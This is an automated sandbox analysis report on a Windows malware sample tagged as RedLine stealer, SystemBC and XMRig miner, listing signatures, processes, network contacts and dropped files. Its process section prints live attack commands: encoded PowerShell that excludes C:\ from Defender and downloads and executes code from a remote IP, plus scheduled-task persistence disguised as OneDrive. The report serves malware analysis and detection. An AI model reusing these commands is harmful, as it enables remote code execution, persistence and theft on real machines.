Malware Analysis Report

2025-04-03 09:38

Sample ID 230506-1bqlrsgb65
Target 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
SHA256 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
Tags
redline systembc xmrig infostealer miner persistence stealer trojan [ pro ] spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d

Threat Level: Known bad

The file 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d was found to be: Known bad.

Malicious Activity Summary

redline systembc xmrig infostealer miner persistence stealer trojan [ pro ] spyware

SystemBC

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

RedLine

Detects Redline Stealer samples

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 21:28

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 21:28

Reported

2023-05-06 22:46

Platform

win7-20230220-en

Max time kernel

150s

Max time network

145s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1316 set thread context of 992 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1316 set thread context of 316 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1264 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 1364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1980 wrote to memory of 1364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1980 wrote to memory of 1364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1984 wrote to memory of 1772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 2044 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 2044 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 2044 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1732 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1732 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1984 wrote to memory of 1732 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1964 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1964 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1964 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1980 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1980 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1980 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1980 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1980 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1980 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1980 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1980 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 908 wrote to memory of 1316 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 908 wrote to memory of 1316 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 908 wrote to memory of 1316 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1116 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 1600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1960 wrote to memory of 992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1960 wrote to memory of 992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1960 wrote to memory of 992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1704 wrote to memory of 892 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1704 wrote to memory of 892 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1704 wrote to memory of 892 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1704 wrote to memory of 892 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1704 wrote to memory of 804 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1704 wrote to memory of 804 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1704 wrote to memory of 804 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1704 wrote to memory of 804 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {DC8F2C41-4C34-4BFD-BF40-8F990DC971DF} S-1-5-21-3499517378-2376672570-1134980332-1000:MLXLFKOI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 00:50 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2AAA.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.45:80 pool.hashvault.pro tcp

Files

memory/1264-54-0x0000000000E10000-0x0000000000E36000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

memory/992-70-0x0000000002680000-0x0000000002700000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6ZZ022LQE1LN5RZOLBPU.temp

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

memory/2040-76-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

memory/1980-75-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/860-77-0x0000000002344000-0x0000000002347000-memory.dmp

memory/860-78-0x000000000234B000-0x0000000002382000-memory.dmp

memory/1980-79-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2040-80-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/992-81-0x0000000002680000-0x0000000002700000-memory.dmp

memory/992-82-0x0000000002680000-0x0000000002700000-memory.dmp

memory/2040-83-0x000000001B080000-0x000000001B08E000-memory.dmp

memory/2040-84-0x000000001BA70000-0x000000001BA80000-memory.dmp

memory/992-87-0x0000000002680000-0x0000000002700000-memory.dmp

memory/992-88-0x0000000002680000-0x0000000002700000-memory.dmp

memory/1980-89-0x0000000002800000-0x0000000002880000-memory.dmp

memory/1980-90-0x0000000002800000-0x0000000002880000-memory.dmp

memory/992-91-0x0000000002680000-0x0000000002700000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
